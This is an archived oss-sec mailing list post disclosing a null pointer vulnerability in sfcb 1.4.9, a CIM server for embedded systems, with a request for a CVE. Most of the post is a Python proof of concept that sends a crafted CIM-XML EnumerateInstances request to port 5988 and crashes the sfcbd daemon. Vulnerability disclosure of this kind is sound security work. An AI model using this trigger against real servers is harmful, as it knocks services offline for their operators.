oss-sec mailing list archives
report a vulnerability in sfcb software.
From: XinleiHe <hxl1999 () yeah net>
Date: Wed, 31 Jan 2018 22:44:22 +0800 (CST)
Hi there, I am XinleiHe. I will report a vulnerability in sfcb software. SFCB is a CIM server for resource-constrained and embedded environments. It's offical website is sblim.sourceforge.net/wiki/index.php/Sfcb. A null pointer vulnerabilty exists in sfcb newest version(1.4.9),a remote attacher can send a crafted packet trigger to this vulnerabilty , and make sfcbd DOS. I want to apply a cve id for this vulnerabilty. You can use following python code to reproduce this vulnerability. -------------------------------------------------------------- import httplib from xml.dom.minidom import Document class write_xml(Document): def __init__(self): Document.__init__(self) def set_tag(self,tag): self.tag = tag self.cim = self.createElement(self.tag) #self.setAttribute("encoding", "utf-8") self.cim.setAttribute("CIMVERSION", "2.0") self.cim.setAttribute("DTDVERSION", "2.0") self.appendChild(self.cim) self.msg = self.createElement("MESSAGE") self.msg.setAttribute("ID", "4711") self.msg.setAttribute("PROTOCOLVERSION","1.0") self.cim.appendChild(self.msg) self.sim = self.createElement("SIMPLEREQ") self.msg.appendChild(self.sim) self.ime = self.createElement("IMETHODCALL") self.ime.setAttribute("NAME","EnumerateInstances") self.sim.appendChild(self.ime) self.local = self.createElement("LOCALNAMESPACEPATH") self.ime.appendChild(self.local) self.names1=self.createElement("NAMESPACE") self.names1.setAttribute("NAME", "root") self.local.appendChild(self.names1) def display(self): print self.toprettyxml(indent=" ") def retdata(self): return self.toprettyxml(indent=" ") def httpreq(data): conn = httplib.HTTPConnection("127.0.0.1", 5988, False) conn.request('POST', '/cimom',data) res = conn.getresponse() def main(): wx = write_xml() wx.set_tag('CIM') print wx.retdata() print httpreq(wx.retdata()) if __name__=='__main__': main() -------------------------------------------------------
Current thread:
- report a vulnerability in sfcb software. XinleiHe (Jan 31)
- Re: report a vulnerability in sfcb software. Adam Maris (Feb 01)